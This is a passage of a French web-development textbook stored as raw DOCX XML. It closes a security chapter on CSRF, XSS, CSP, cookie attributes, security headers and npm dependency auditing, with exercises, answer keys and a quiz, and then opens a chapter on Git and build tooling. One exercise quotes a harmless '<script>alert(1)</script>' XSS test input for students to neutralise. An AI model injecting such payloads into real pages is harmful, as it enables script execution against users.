                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Attribut du cookie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>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Jeton anti-CSRF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Soumission forgée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Champ caché vérifié</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>HTTPS partout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Écoute passive</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3208"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Redirection + HSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2750"/>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Limitation de débit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Force brute</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="320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Côté serveur</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CSRF</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cross-Site Request Forgery : un site tiers déclenche une requête authentifiée vers votre application, en profitant des cookies envoyés automatiquement.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre en-têtes, quatre protections · http</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En-têtes de sécurité d'une application web</w:t>
        <w:br/>
        <w:t>Strict-Transport-Security: max-age=31536000; includeSubDomains</w:t>
        <w:br/>
        <w:t>X-Content-Type-Options: nosniff</w:t>
        <w:br/>
        <w:t>Referrer-Policy: strict-origin-when-cross-origin</w:t>
        <w:br/>
        <w:t>Permissions-Policy: camera=(), microphone=(), geolocation=()</w:t>
        <w:br/>
        <w:t>X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche le navigateur de deviner un type MIME, ce qui bloque certaines attaques par fichier déguisé. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Referrer-Policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> limite les fuites d'URL vers les sites tiers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>34.6 Dépendances et chaîne d'approvisionnement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La majorité du code exécuté dans un projet vient de dépendances externes. Une bibliothèque compromise contamine tous ses utilisateurs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Quatre commandes d'hygiène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npm audit                    # vulnérabilités connues</w:t>
        <w:br/>
        <w:t>npm outdated                 # versions obsolètes</w:t>
        <w:br/>
        <w:t>npm ci                       # installation reproductible depuis le verrou</w:t>
        <w:br/>
        <w:t>npm ls --all                 # arbre complet des dépendances</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.110 — Quatre risques de dépendance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05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Risque</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Symptôme</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Réponse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Dépendance vulnérable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>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Alerte </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>npm audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Mettre à jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Paquet malveillant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Nom proche d'un paquet connu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Vérifier l'éditeur</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3056"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Version non figée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3361"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Résultat différent selon la machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2597"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verrouiller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="305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Script d'installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="336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Exécution à l'installation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="259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Auditer, restreindre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SÉCURITÉ, QUATRE RÉFLEXES QUOTIDIENS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Traiter toute entrée comme hostile.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Insérer par </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>textContent</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>, jamais par concaténation HTML.</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Servir tout le site en HTTPS.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Mettre à jour les dépendances chaque mois.</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XSS survient quand une donnée devient du HTML.</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textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> neutralise l'injection de balises.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CSP bloque les scripts non autorisés.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Les cookies </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Secure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> et </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SameSite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> protègent la session.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validation côté client ne remplace pas la validation serveur.</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en-têtes de sécurité limitent plusieurs classes d'attaque.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dépendances font partie de la surface d'attaque.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le code est sûr et mesuré. Il reste à le versionner, le construire et le livrer : c'est l'objet des deux derniers chapitres.</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34.1 — Neutraliser une injection</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Ce code affiche un commentaire reçu d'une API.</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Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>zone.innerHTML = commentaire.texte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 xml:space="preserve">Le commentaire contient </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(1)&lt;/script&gt;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Corrigez sans perdre la mise en forme du texte.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 34.2 — Rédiger une CSP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   SÉCURITÉ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le site charge des images locales, une police auto-hébergée et un script d'analyse externe.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Autorisez uniquement le nécessaire.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Bloquez l'intégration en iframe.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Prévoyez un rapport de violation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 34.3 — Auditer les dépendances</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 audit signale plusieurs vulnérabilités.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Classez par gravité.</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Distinguez correctif direct et indirect.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Planifiez la mise à jour.</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34.1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Plusieurs paragraphes, sans interpréter le HTML</w:t>
        <w:br/>
        <w:t>const paragraphes = commentaire.texte.split("\n").filter(Boolean);</w:t>
        <w:br/>
        <w:t>zone.replaceChildren(</w:t>
        <w:br/>
        <w:t xml:space="preserve">  ...paragraphes.map((texte) =&gt; {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    const p = document.createElement("p");</w:t>
        <w:br/>
        <w:t xml:space="preserve">    p.textContent = texte;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    return p;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  })</w:t>
        <w:br/>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> affiche les balises comme du texte : le script n'est jamais exécuté.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Découper en paragraphes restitue la mise en forme sans recourir au HTML brut.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 34.2</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default-src 'self';</w:t>
        <w:br/>
        <w:t>img-src 'self' data:;</w:t>
        <w:br/>
        <w:t>style-src 'self';</w:t>
        <w:br/>
        <w:t>script-src 'self' https://stats.exemple.fr;</w:t>
        <w:br/>
        <w:t>font-src 'self';</w:t>
        <w:br/>
        <w:t>connect-src 'self';</w:t>
        <w:br/>
        <w:t>frame-ancestors 'none';</w:t>
        <w:br/>
        <w:t>base-uri 'self';</w:t>
        <w:br/>
        <w:t>form-action 'self';</w:t>
        <w:br/>
        <w:t>report-uri /api/csp-report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>default-src 'self'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ferme tout par défaut ; chaque directive n'ouvre que ce qui est nécessaire.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>frame-ancestors 'none'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche le détournement par iframe (clickjacking).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 34.3</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Identifier l'origine d'une dépendance transitive</w:t>
        <w:br/>
        <w:t>npm ls paquet-vulnerable</w:t>
        <w:br/>
        <w:br/>
        <w:t># Mettre à jour dans les limites du verrou sémantique</w:t>
        <w:br/>
        <w:t>npm update</w:t>
        <w:br/>
        <w:br/>
        <w:t># Corriger les vulnérabilités connues, y compris majeures</w:t>
        <w:br/>
        <w:t>npm audit fix</w:t>
        <w:br/>
        <w:br/>
        <w:t># Vérifier après correction</w:t>
        <w:br/>
        <w:t>npm audit --audit-level=high</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une vulnérabilité transitive se corrige souvent en mettant à jour la dépendance directe qui l'introduit.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une mise à jour majeure exige des tests : ne l'appliquez pas en production sans vérification.</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Quelle faille permet d'exécuter du script dans la page d'un autre utilisateur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CSRF</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XSS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Injection SQL</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Clickjacking</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Quelle propriété insère du texte sans interpréter les balises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innerHTML</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textContent</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outerHTML</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document.write</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À quoi sert la CSP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À chiffrer les données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À restreindre les sources de ressources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À accélérer le site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À compresser les images</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Quel attribut de cookie le rend inaccessible au JavaScript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Secure</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SameSite</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HttpOnly</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Path</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La validation côté client suffit-elle à protéger un serveur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Oui</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Non, elle doit être répétée côté serveur</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Oui si le formulaire est en HTTPS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Oui avec une CSP</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Une XSS injecte du code exécuté dans le contexte de la page.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> traite la donnée comme du texte brut.</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Elle liste les origines autorisées et bloque le reste.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>4. C.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HttpOnly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> empêche la lecture par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>document.cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.</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Un attaquant peut envoyer directement les données au serveur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>35. Versionner, construire et outiller son projet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Git, gestionnaires de paquets et chaîne de construction : les outils qui transforment des fichiers en application livrable.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Intermédiaire · Prérequis : chapitre 34</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Utiliser Git au quotidien avec des messages utiles.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Structurer un dépôt et rédiger un </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.gitignore</w:t>
            </w:r>
